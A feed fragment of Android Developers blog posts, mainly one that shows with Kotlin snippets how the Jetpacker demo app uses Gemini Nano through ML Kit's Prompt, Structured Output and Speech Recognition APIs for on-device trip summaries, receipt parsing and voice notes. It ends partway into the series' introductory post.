    <content type="html">&lt;img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhd7g4aJ0ZhzVcuPr3SzBJIVQ_MZT3hIXb1Ff8SVjjrvRjYzZwhgoE7IbHryS6Ds7u7if1_tmVmMdkFNAtPADXoeuRQ_64Pxfnp3oq2aHR8hbS3fDExGxE0nSiOvXPw7SonhNdjFNI2eDJfasEEMs0xjh2gZlyPq6ToimvFlaMv2-nVDz_XLnSXK1iCn4U/s2469/0625%20Building%20JetPacker%20with%20Intelligent%20On-Device%20features_Meta%20v02.png" style="display: none;" /&gt;&lt;div&gt;&lt;i&gt;Posted by Caren Chang, Developer Relations Engineer, Android Developer Relations&lt;/i&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIU-6haqWEXnugbhG5is8t1TU0tN3EkfSc7GwvHMRsMSU14k-P7q4il_nJlGk-qNP_PG3aKs1LDWNgWKqhFsG6Q16v2zeoHMvqY_PesC5ddxHRjTGgtiQ33uvOrUIPkSdUgFfBIYSkqBhcuZJTY8jbW0mOjKs8XF8DLxfyD7CjJ1Sd4FM7AUrufTnSEVw/s8582/0625%20Building%20JetPacker%20with%20Intelligent%20On-Device%20features_Blog%20v02.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIU-6haqWEXnugbhG5is8t1TU0tN3EkfSc7GwvHMRsMSU14k-P7q4il_nJlGk-qNP_PG3aKs1LDWNgWKqhFsG6Q16v2zeoHMvqY_PesC5ddxHRjTGgtiQ33uvOrUIPkSdUgFfBIYSkqBhcuZJTY8jbW0mOjKs8XF8DLxfyD7CjJ1Sd4FM7AUrufTnSEVw/s1600/0625%20Building%20JetPacker%20with%20Intelligent%20On-Device%20features_Blog%20v02.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;div&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;p&gt;Welcome back to the blog post series "&lt;a href="http://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-introduction-jetpack.html" target="_blank"&gt;Build intelligent Android apps&lt;/a&gt;" where we take a basic Android app and transform it into a &lt;b&gt;personalized, intelligent, &lt;/b&gt;and &lt;b&gt;agentic &lt;/b&gt;experience. In our &lt;a href="http://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-introduction-jetpack.html" target="_blank"&gt;previous post we introduced Jetpacker&lt;/a&gt;, the demo app we'll use throughout this series.&lt;/p&gt;

&lt;p&gt;In this blog post, we will share how you can use Gemini Nano through &lt;a href="https://developers.google.com/ml-kit/genai/prompt/android"&gt;ML Kit’s Prompt API&lt;/a&gt; to build intelligent on-device features.&lt;/p&gt;
&lt;div style="height: 0px; margin: 0px auto; overflow: hidden; padding-bottom: 56.25%;"&gt;
  
  
&lt;/div&gt;

&lt;p&gt;Building intelligent on-device features refers to the ability to process prompts and data directly on a device without sending data to a server. This offers a few advantages:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;User data can be processed &lt;b&gt;locally&lt;/b&gt; on the device, preserving user privacy&lt;/li&gt;
  &lt;li&gt;Functionality of the model is &lt;b&gt;reliable&lt;/b&gt; even with spotty or no internet connection&lt;/li&gt;
  &lt;li&gt;No additional cloud inference &lt;b&gt;cost&lt;/b&gt;, since everything runs on the user’s hardware&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;With the benefits of on-device in mind, we identified three features to add in Jetpacker that can improve the user experience: summarizing trip itineraries, managing expenses, and capturing voice notes.&lt;/p&gt;

&lt;h2&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3FDrGSpGJqSapXXQ7052s1NR8rzvmmW-xbyOaAcg8bdTA6ZH7p6ZWE664FjlaoDLfREd-RlQil7gV-VjnCoq76o06haLoSxBzlIDAvM-dKvm_TCgPvqHU3ZlzBTXZ9XtAyMk26QWB8PvU5aUmzO0RBuMxqxJdC1wk7xl_1PXd1KHvuMCeHeAP9zhgSjg/s1848/Screenshot%202026-07-02%20at%2012.57.08%E2%80%AFPM.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="434" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3FDrGSpGJqSapXXQ7052s1NR8rzvmmW-xbyOaAcg8bdTA6ZH7p6ZWE664FjlaoDLfREd-RlQil7gV-VjnCoq76o06haLoSxBzlIDAvM-dKvm_TCgPvqHU3ZlzBTXZ9XtAyMk26QWB8PvU5aUmzO0RBuMxqxJdC1wk7xl_1PXd1KHvuMCeHeAP9zhgSjg/w640-h434/Screenshot%202026-07-02%20at%2012.57.08%E2%80%AFPM.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-weight: normal;"&gt;&lt;span style="font-size: small;"&gt;&lt;i&gt;On-device features in Jetpacker: Summarizing trip itineraries, managing expenses, and voice notes&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;High quality tailored summarization of short texts&lt;/h2&gt;

&lt;p&gt;The itinerary screen gives users a quick overview of all activities for a given trip. Since this screen contains a lot of information, it can quickly become overwhelming. To help users prepare without feeling overwhelmed, we can add a ‘&lt;b&gt;Get ready for your trip&lt;/b&gt;’ section at the top.&lt;/p&gt;
&lt;p style="text-align: center;"&gt;&lt;em&gt;&lt;/em&gt;&lt;/p&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;em&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtWrJplvxl7ymB4kMN_Tg4tYYkL7G1Ory0hSptzqsbw_xCu4I9l_4SQPQ9CUXs_Jc7qtT1KcpltBds0aYgIvXiK_-qp6fnoX3QmYnGyqGgr2d5f2uzQkyMK-_Iebwp9Ap0aJA4c8Pz4Zy01O5AM6kk_qZ4Blx_bY-_2xIxSA8DMva2LWBbCN_Hb_c37KE/s2499/Screenshot_20260702_111934.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtWrJplvxl7ymB4kMN_Tg4tYYkL7G1Ory0hSptzqsbw_xCu4I9l_4SQPQ9CUXs_Jc7qtT1KcpltBds0aYgIvXiK_-qp6fnoX3QmYnGyqGgr2d5f2uzQkyMK-_Iebwp9Ap0aJA4c8Pz4Zy01O5AM6kk_qZ4Blx_bY-_2xIxSA8DMva2LWBbCN_Hb_c37KE/w189-h400/Screenshot_20260702_111934.png" width="189" /&gt;&lt;/a&gt;&lt;/em&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;&lt;span style="font-weight: normal;"&gt;&lt;span style="font-size: small;"&gt;&lt;i&gt;The romantic Paris trip is summarized as a classic Parisian adventure blending art, sights, and delicious food. A tip and some useful phrases are also added.&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;p&gt;&lt;/p&gt;

&lt;p&gt;By inputting a trip itinerary and asking an LLM to summarize it, we can generate a quick summary of the trip along with packing tips and useful local phrases. This is a great use case for an on-device model for several reasons:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;b&gt;Performance and quality&lt;/b&gt;: Both the input and output text are relatively short. With that, we can expect the performance and quality of an on-device solution to be on par with more powerful cloud models.&lt;/li&gt;
  &lt;li&gt;&lt;b&gt;Scalability&lt;/b&gt;: Shifting inference on-device allows us to scale this feature from a few users to millions without worrying about managing increasing cloud inference costs.&lt;/li&gt;
  &lt;li&gt;&lt;b&gt;Low latency and reliability&lt;/b&gt;: On-device inference guarantees low latency, providing a reliable experience even when users are offline.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;To build with on-device, we use &lt;b&gt;Gemini Nano&lt;/b&gt;, Google’s most efficient model optimized for mobile devices. Gemini Nano was first introduced a few years ago, and is now running on over 140 million devices. The latest version of the model, &lt;a href="https://android-developers.googleblog.com/2026/04/AI-Core-Developer-Preview.html"&gt;Gemini Nano 4, is built on the architecture foundation of the recently released Gemma 4 model&lt;/a&gt;, and is further optimized for maximum battery and performance efficiency.&lt;/p&gt;

&lt;p&gt;Using ML Kit’s &lt;b&gt;Prompt API&lt;/b&gt;, we can take advantage of Gemini Nano 4’s new model capabilities to prototype our on-device features. We’ll create a prompt that includes the itinerary of a trip and ask the model to generate a summary along with any preparation tips.&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;// implementation("com.google.mlkit:genai-prompt:1.0.0-beta3") 

// Define the configuration for Gemini Nano 4 E2B preview model
val previewFastConfig = generationConfig {
    modelConfig = modelConfig {
        releaseStage = ModelReleaseStage.PREVIEW
        preference = ModelPreference.FAST
    }
}

val geminiNano2BPreviewModel = Generation.getClient(previewFastConfig)

val tripItinerary = ...

val getReadyForYourTripSummary = geminiNano2BPreviewModel
 .generateContent("Given this trip itinerary: $tripItinerary, 
     generate the following: overall vibe, tips on how to prepare for this
     trip, and common short phrases to learn for the trip.")&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Finding the optimal prompt usually requires some iteration, and the AICore app is perfect for this step in the process. After opting into the &lt;a href="https://developers.google.com/ml-kit/genai/aicore-dev-preview"&gt;developer preview option for AICore&lt;/a&gt;, we can download preview models such as Gemini Nano 4 to test prompts and see the model’s expected outputs. With a few iterations on the prompt, we were able to improve the speed of the response from 13 seconds to under 2 seconds! Check out the final code implementation and prompt &lt;a href="https://github.com/android/ai-samples/blob/40b999ef0e85693eac4de06e58335f0f5f125fa6/jetpacker/android/feature/trip/itinerary/enrichment/src/main/kotlin/com/example/jetpacker/feature/itinerary_enrichment/TripSummaryAndTipsProviderImpl.kt#L100" target="_blank"&gt;here&lt;/a&gt;.&lt;/p&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaY2Q7rzlrAj2i410lc3qqtKwI3m6ufAi27R5S94LVFJKEJPnxmvShIcAWdD_Cx9lhTz9tmKW_DVcmNg0rZFBKpqYj0M9niFJwa-AurlyV2SHuErI7Z9H59Q9S936I4ErUQ_NFRNSJpUBXwDVmw6vKNVpIkBrYPJNUpCIyNXl5Z17x7jEl5Kn9BGgFuLg/s553/Screen%20Recording%202026-07-02%20at%2012.28.51%E2%80%AFPM.gif" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaY2Q7rzlrAj2i410lc3qqtKwI3m6ufAi27R5S94LVFJKEJPnxmvShIcAWdD_Cx9lhTz9tmKW_DVcmNg0rZFBKpqYj0M9niFJwa-AurlyV2SHuErI7Z9H59Q9S936I4ErUQ_NFRNSJpUBXwDVmw6vKNVpIkBrYPJNUpCIyNXl5Z17x7jEl5Kn9BGgFuLg/w359-h400/Screen%20Recording%202026-07-02%20at%2012.28.51%E2%80%AFPM.gif" width="359" /&gt;&lt;/a&gt;&lt;/div&gt;

&lt;div style="text-align: center;"&gt;&lt;span style="font-weight: normal;"&gt;&lt;span style="font-size: small;"&gt;&lt;i&gt;The first iteration of our prompt generated way too many tokens, and optimizing it helped keep responses quick and to the point.&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;

&lt;h2&gt;Local processing for sensitive user input&lt;/h2&gt;

&lt;p&gt;Next, to help users enjoy their trip even more, we’ll build a simple expense manager that takes the manual work out of sorting through receipts and calculating budgets.&lt;/p&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsHCjYJhDefKk1_FHnyB8mXO6XGrVWPrWkkxUikHNrWly2YqLjD8GyN-qGXOBlZCJPug-VbVgBr8awg8I-TEl6d9udKhq_zKem9Xcdb7FzFlA4B77Iko2Rbf8R0XIPB30owcMoh-7KJ1paQnzDrNHSdvwYotNxt166QqJdNAf1d8wEwIFkL9qIEYUKmoQ/s1282/7.13_BlogGif_Transparent.gif" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsHCjYJhDefKk1_FHnyB8mXO6XGrVWPrWkkxUikHNrWly2YqLjD8GyN-qGXOBlZCJPug-VbVgBr8awg8I-TEl6d9udKhq_zKem9Xcdb7FzFlA4B77Iko2Rbf8R0XIPB30owcMoh-7KJ1paQnzDrNHSdvwYotNxt166QqJdNAf1d8wEwIFkL9qIEYUKmoQ/w191-h400/7.13_BlogGif_Transparent.gif" width="191" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
  
&lt;div style="text-align: center;"&gt;&lt;span style="font-weight: normal;"&gt;&lt;span style="font-size: small;"&gt;&lt;i&gt;Taking a photo of a restaurant bill, data is parsed and shown in the expense overview screen of the app.&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;

&lt;p&gt;Since receipts might contain sensitive information like credit card number and addresses, this is another great use case for an on-device solution. With on-device, users can be confident that private information will be processed locally on the device without any of their data being sent to the cloud.&lt;/p&gt;

&lt;p&gt;In addition, Gemini Nano 4 has improved model capabilities for multimodality, especially for image understanding tasks like OCR and visual data extraction, making it a great solution for tasks like extracting information from receipts.&lt;/p&gt;

&lt;p&gt;For this use case, the prompt will analyze an image of the receipt, and output information such as: a generated title, amount spent and category of the expense. To ensure the model outputs the information in the preferred format, we can use &lt;a href="https://developers.google.com/ml-kit/genai/prompt/android/structured-output"&gt;ML Kit’s Structured Output API&lt;/a&gt; to seamlessly output a Kotlin data object that we define.&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;// implementation("com.google.mlkit:genai-prompt:1.0.0-beta3")
// ksp("com.google.mlkit:genai-schema-compiler:1.0.0-alpha1")

@Generable("Information extracted from an expense receipt")
data class ParsedReceipt(
  @Guide("Generated title for the expense less than 6 words. Based on restaurant or activity name.")
  val title: String,
  @Guide("Total amount of the expense. Look for values at the bottom and words like total or balance due.")
  val amount: Double,
  @Guide("Type of expense", enumValues = ["travel", "food", "shopping", "entertainment", "other"])
  val category: String,
)

val prompt = "Determine if the image is a receipt or expense. 
    If it is NOT a receipt or expense, output the text 'NOT_A_RECEIPT'.
    Otherwise, parse the receipt information."

val request = generateContentRequest(ImagePart(bitmap), TextPart(prompt)) {}
val requestWithStructuredOutput = generateTypedContentRequest(request, ParsedReceipt::class)

// Define the configuration for Gemini Nano 4 E4B preview model  
// When selecting models, you can specify which performance charactertists are most important
//  for your use case. Use ModelPreference.FULL when you want to prioritize reasoning power over speed. 
//  Use ModelPreference.FAST when complex logic is not required and latency is a priority.
val previewFullConfig = generationConfig {
    modelConfig = modelConfig {
        releaseStage = ModelReleaseStage.PREVIEW
        preference = ModelPreference.FULL
    }
}

val geminiNano4BPreviewModel = Generation.getClient(previewFullConfig)
val response = geminiNano4BPreviewModel.generateContent(requestWithStructuredOutput)
val parsedReceipt: ParsedReceipt? = response.candidates.firstOrNull()?.response&lt;/code&gt;&lt;/pre&gt;

&lt;h2&gt;Multimodal input&lt;/h2&gt;

&lt;p&gt;Lastly, to help users record audio memos during the trip, let’s build a fully on-device voice notes feature. Using &lt;a href="https://developers.google.com/ml-kit/genai/speech-recognition/android"&gt;ML Kit’s Speech Recognition API&lt;/a&gt;, we’ll enable users to record short voice notes that are automatically transcribed to text. With the transcribed text, we’ll use ML Kit’s Prompt API to identify which trip activity is associated with the recorded voice note, letting users easily recap their trip as they scroll through the trip’s itinerary.&lt;/p&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnAm4XPVEJkfPmRFKJWh2sS-4rVz_eFollYxU5DWb7kAkSQdP4xhAEosziS_vpxv6yoAkvHiSp6SGYOp2_qp_cJWgfbJGnDOadaMP6Bc30a6rYnSP34sEubNAWXqsmd3cpYOoL8rCUhQn0_4GT3165aSFinlnHZjVnXYNYBAw8AdVtJpuRG2gDbi-uRII/s2499/Screenshot_20260702_115529.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnAm4XPVEJkfPmRFKJWh2sS-4rVz_eFollYxU5DWb7kAkSQdP4xhAEosziS_vpxv6yoAkvHiSp6SGYOp2_qp_cJWgfbJGnDOadaMP6Bc30a6rYnSP34sEubNAWXqsmd3cpYOoL8rCUhQn0_4GT3165aSFinlnHZjVnXYNYBAw8AdVtJpuRG2gDbi-uRII/w189-h400/Screenshot_20260702_115529.png" width="189" /&gt;&lt;/a&gt;&lt;/div&gt;

&lt;p style="text-align: center;"&gt;&lt;em&gt;The Roman holiday itinerary shows voice note extracts.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The &lt;a href="https://developers.google.com/ml-kit/genai/speech-recognition/android"&gt;ML Kit GenAI Speech Recognition API &lt;/a&gt;allows you to transcribe audio content to text fully on-device using two distinct modes. &lt;b&gt;Basic mode&lt;/b&gt; uses a traditional on-device speech recognition model and is available on most Android devices with API level 31 and higher. &lt;b&gt;Advanced mode&lt;/b&gt; uses Gemini Nano to offer broader language coverage and better quality, and is currently supported on Pixel 10 devices.&lt;/p&gt;

&lt;p&gt;For our feature we combine the Speech Recognition API with the ML Kit GenAI Prompt API:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;// implementation("com.google.mlkit:genai-prompt:1.0.0-beta3")
// implementation("com.google.mlkit:genai-speech-recognition:1.0.0-alpha1")

val tripEvents = ... 

// Set up speech recognition
val speechRecognizerOptions =
    speechRecognizerOptions {
        locale = Locale.US
        preferredMode = SpeechRecognizerOptions.Mode.MODE_ADVANCED
    }
val speechRecognizer: SpeechRecognizer = SpeechRecognition.getClient(speechRecognizerOptions)

suspend fun transcribeVoiceNote(recognizer: SpeechRecognizer) {
    // Display partial text as the user is recording audio
    var partialTextResponse = ""

    // Display the full text once user is finished recording audio
    var transcription = ""

    val request: SpeechRecognizerRequest
        = speechRecognizerRequest { audioSource = AudioSource.fromMic() }
    recognizer.startRecognition(request).collect { response -&amp;gt;
        when (response) {
            is SpeechRecognizerResponse.PartialTextResponse -&amp;gt; {
                partialTextResponse = response.text
            }
            is SpeechRecognizerResponse.FinalTextResponse -&amp;gt; {
                transcription = response.text
                processAndCategorizeVoiceNote(transcription, tripEvents)
            }
        }
    }
}

fun processAndCategorizeVoiceNote(transcribedVoiceNote: String, events: List) {
    val prompt = "Given the voice note $transcribedVoiceNote
     and the following events for this trip: $events, rewrite this transcription
     to remove filler words. Then, identify which events from the
     list this rewritten transcription matches to."

     // Utilize ML Kit's Prompt API to process voice note and tag it with the relevant trip activities
     Generation.getClient().generateContent(prompt)
}&lt;/code&gt;&lt;/pre&gt;

&lt;h2&gt;Conclusion&lt;/h2&gt;

&lt;p&gt;Using ML Kit’s GenAI APIs, we were able to take advantage of Gemini Nano to develop fully on-device intelligent features for the JetPacker app, and provide an improved user experience without any additional cloud costs.&lt;/p&gt;

&lt;p&gt;Check out the full source code for &lt;a href="https://github.com/android/ai-samples/tree/main/jetpacker" target="_blank"&gt;Jetpacker on Github&lt;/a&gt;, and watch the video &lt;a href="https://www.youtube.com/watch?v=_iuXykdlTkk"&gt;Build Intelligent Android apps with Google’s AI&lt;/a&gt; to learn more about how to integrate intelligent features directly into your app using on-device models, cloud-powered reasoning, and the latest agentic frameworks.&lt;/p&gt;&lt;h2&gt;Learn more&lt;/h2&gt;

&lt;p&gt;Check out the other parts of this blog post series:&lt;/p&gt;&lt;a href="http://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-introduction-jetpack.html"&gt;&lt;b&gt;Part 1:&lt;/b&gt;&lt;/a&gt; Introduction of the app and a high-level overview.&lt;br /&gt;&lt;a href="http://android-developers.googleblog.com/2026/07/android-on-device-inference.html"&gt;&lt;b&gt;Part 2 (this post!):&lt;/b&gt;&lt;/a&gt;&amp;nbsp;On-device intelligence. Deep-dive into ML Kit’s GenAI APIs and Gemini Nano to build privacy-first features like itinerary summarization, receipt parsing, and local audio processing.&lt;br /&gt;&lt;a href="http://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-cloud-hybrid-inference.html"&gt;&lt;b&gt;Part 3:&lt;/b&gt; &lt;/a&gt;Hybrid and cloud reasoning. Explore how to use Firebase AI Logic to ground LLM answers in real-world data like Google Maps and web context.&lt;br /&gt;&lt;a href="http://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-appfunctions.html"&gt;&lt;b&gt;Part 4:&lt;/b&gt;&lt;/a&gt; System integration. Integrating with the Android intelligence system using AppFunctions.&lt;br /&gt;Part 5 (coming soon): In-app agentic workflows. Extend the app with an end-to-end booking assistant powered by A2UI and ADK.

&lt;p&gt;Interested in more on Android Development? Follow Android Developers on &lt;a href="https://www.youtube.com/@AndroidDevelopers"&gt;YouTube&lt;/a&gt; or &lt;a href="https://www.linkedin.com/showcase/androiddev/"&gt;LinkedIn&lt;/a&gt;!&lt;/p&gt;

&lt;p&gt;All code snippets in this blog post follow the following copyright notice:&lt;br /&gt;
&lt;/p&gt;&lt;pre&gt;&lt;code&gt;Copyright 2026 Google LLC.
SPDX-License-Identifier: Apache-2.0&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;&lt;/p&gt;&lt;/div&gt;&lt;/div&gt;</content>
    <link href="https://android-developers.googleblog.com/2026/07/android-on-device-inference.html" rel="alternate"/>
    <category term="Android Developers"/>
    <published>2026-07-21T13:00:00+00:00</published>
    <media:group>
      <media:content url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhd7g4aJ0ZhzVcuPr3SzBJIVQ_MZT3hIXb1Ff8SVjjrvRjYzZwhgoE7IbHryS6Ds7u7if1_tmVmMdkFNAtPADXoeuRQ_64Pxfnp3oq2aHR8hbS3fDExGxE0nSiOvXPw7SonhNdjFNI2eDJfasEEMs0xjh2gZlyPq6ToimvFlaMv2-nVDz_XLnSXK1iCn4U/s72-c/0625%20Building%20JetPacker%20with%20Intelligent%20On-Device%20features_Meta%20v02.png" type="image/png" medium="image"/>
      <media:thumbnail url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhd7g4aJ0ZhzVcuPr3SzBJIVQ_MZT3hIXb1Ff8SVjjrvRjYzZwhgoE7IbHryS6Ds7u7if1_tmVmMdkFNAtPADXoeuRQ_64Pxfnp3oq2aHR8hbS3fDExGxE0nSiOvXPw7SonhNdjFNI2eDJfasEEMs0xjh2gZlyPq6ToimvFlaMv2-nVDz_XLnSXK1iCn4U/s72-c/0625%20Building%20JetPacker%20with%20Intelligent%20On-Device%20features_Meta%20v02.png"/>
    </media:group>
    <link rel="enclosure" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhd7g4aJ0ZhzVcuPr3SzBJIVQ_MZT3hIXb1Ff8SVjjrvRjYzZwhgoE7IbHryS6Ds7u7if1_tmVmMdkFNAtPADXoeuRQ_64Pxfnp3oq2aHR8hbS3fDExGxE0nSiOvXPw7SonhNdjFNI2eDJfasEEMs0xjh2gZlyPq6ToimvFlaMv2-nVDz_XLnSXK1iCn4U/s72-c/0625%20Building%20JetPacker%20with%20Intelligent%20On-Device%20features_Meta%20v02.png" type="image/png" length="0"/>
  </entry>
  <entry>
    <id>https://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-introduction-jetpack.html</id>
    <title>Build intelligent Android apps: Introduction to Jetpacker</title>
    <updated>2026-07-21T13:00:00+00:00</updated>
    <content type="html">&lt;img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigBFwd7rJO49I_puODKBWFqPbpHaGyL3CTFuZBbr0HTQConFnc3JP0dL9Rr_i6wmyW0o4Ku2bvv3SEacwpC3Vc6b7cYy0aRbZKdUDudFcraYO8zcBVkrMfbrfMP9How0J1xSi91xLnR4s5Z3s-Lp6RF2SA0gU56B9nXD0NkD_CU8MT6wbgBw1tRaMWcMo/s2469/0713%20Jetpacker%20Meta.png" style="display: none;" /&gt;
&lt;div&gt;&lt;i&gt;Posted by Jolanda Verhoef, Senior Developer Relations Engineer,&amp;nbsp;&lt;/i&gt;&lt;i&gt;Android Developer Relations&lt;/i&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFlbIY8mjuSzlWuS8mnGJ3v8Je-yrtFFaBHNXumMqS0rbaS32wv5HUhI4mv5pHT8ro0Rfb-duyMhK8_OeKnMyocY9s6GmC9_pgTEv6sgZoiaZpD00sODTTctYV8I4RHddKWcXAMUyTASk97cS1ysx4A2PFYB6PEeiHeN93BFgDiOTKH62ZJMig3kGP66E/s8583/0713%20Jetpacker%20Blog.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFlbIY8mjuSzlWuS8mnGJ3v8Je-yrtFFaBHNXumMqS0rbaS32wv5HUhI4mv5pHT8ro0Rfb-duyMhK8_OeKnMyocY9s6GmC9_pgTEv6sgZoiaZpD00sODTTctYV8I4RHddKWcXAMUyTASk97cS1ysx4A2PFYB6PEeiHeN93BFgDiOTKH62ZJMig3kGP66E/s1600/0713%20Jetpacker%20Blog.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;p&gt;Building GenAI features in your app usually means navigating through various models, APIs and architecture choices:&amp;nbsp;&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;strong&gt;Execution location:&lt;/strong&gt; Where does your model run? On device, in the cloud, or both?&lt;/li&gt;
  &lt;li&gt;&lt;strong&gt;Complexity:&lt;/strong&gt; How complex is your setup? Are you doing a single inference call or do you need a more agentic flow?&lt;/li&gt;
  &lt;li&gt;&lt;strong&gt;In-app or Android System:&lt;/strong&gt; Should your feature be built into your Android app or does it fit better as an Android system integration?&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;In this blog post series we'll navigate these choices with you. We will take you along on a journey, starting with a basic mobile app and transforming it into a &lt;b&gt;personalized&lt;/b&gt;, &lt;b&gt;intelligent&lt;/b&gt;, and &lt;b&gt;agentic&lt;/b&gt; experience.&lt;/p&gt;

&lt;h2&gt;Jetpacker: a demo travel app&lt;/h2&gt;
&lt;p&gt;Jetpacker is a &lt;b&gt;technical showcase app&lt;/b&gt; that our team built from the ground up for this year's Google I/O (built using Antigravity). At its core, Jetpacker helps users plan, explore, and enjoy their next big adventure. It shows an overview of your trips, the itinerary of each trip, and details of each event on that trip. Of course following all best practices of Android development, including a beautifully expressive Material UI design.&lt;/p&gt;&lt;div style="height: 0px; overflow: hidden; padding-bottom: 56.25%;"&gt;
  
  
&lt;/div&gt;

&lt;p&gt;And best of all? It's fully &lt;a href="https://github.com/android/ai-samples/tree/main/jetpacker" target="_blank"&gt;open source&lt;/a&gt;!&lt;/p&gt;

&lt;p&gt;Today we are publishing a series of&lt;b&gt; technical blog posts&lt;/b&gt; diving deep into each of these features. We’ll provide detailed implementation steps, code snippets, and architectural insights to help you build your own intelligent Android applications.&lt;/p&gt;

&lt;h2&gt;&lt;a href="http://android-developers.googleblog.com/2026/07/android-on-device-inference.html"&gt;On-device intelligence&lt;/a&gt;&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7d4EqOTEFypjsqmFoZ8h-zPw3QqQkNY1F_vdbJ98vv1QJCqIE8P-reC0fttcMfNk05g3kGSLhGXVaeiOQDqARK6ptNhFe43miZgTNSmdF7V5hh6u4PhjQleWXmxDqkAf5YKPPyBU14V9z_wFfkiwVDCHN0rkLDtbZCGnb6Jq8d7Iu3YRVgDd9fcMeTiA/s1848/on-device-features.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7d4EqOTEFypjsqmFoZ8h-zPw3QqQkNY1F_vdbJ98vv1QJCqIE8P-reC0fttcMfNk05g3kGSLhGXVaeiOQDqARK6ptNhFe43miZgTNSmdF7V5hh6u4PhjQleWXmxDqkAf5YKPPyBU14V9z_wFfkiwVDCHN0rkLDtbZCGnb6Jq8d7Iu3YRVgDd9fcMeTiA/s1600/on-device-features.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;i&gt;On-device features in Jetpacker: Summarizing trip itineraries, managing expenses, and voice notes&lt;/i&gt;&lt;/div&gt;&lt;p&gt;Using an on-device model comes with &lt;b&gt;no additional cloud inference&lt;/b&gt; costs, means you don't have to worry about &lt;b&gt;internet connectivity&lt;/b&gt;, and lets users be confident that private information will be &lt;b&gt;processed locally&lt;/b&gt;, on the device, without any of their data being sent to the cloud.&lt;/p&gt;

&lt;p&gt;In Jetpacker, we chose on-device inference for three of our features:&lt;/p&gt;
&lt;ul&gt;
